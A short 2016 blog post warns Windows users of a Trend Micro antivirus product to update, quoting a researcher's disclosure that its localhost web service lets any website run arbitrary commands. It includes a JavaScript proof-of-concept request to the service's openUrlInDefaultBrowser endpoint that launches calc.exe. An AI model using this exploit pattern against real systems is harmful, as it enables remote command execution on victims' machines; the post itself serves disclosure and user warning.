If you're running TendMicro's antivirus solution on Windows, update it asap!!

The blog is currently being ported from WordPress to over 12 years of static pages of content. If there's an article missing that you're hoping to see, please contact me and let me know and I'll prioritize getting it online.

January 12, 2016

If you’re running TendMicro’s antivirus solution on Windows, update it asap!!

A major information security flaw was detected in the software: it runs a localhost web service that is very vulnerable to attacks.

From the security post:

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {};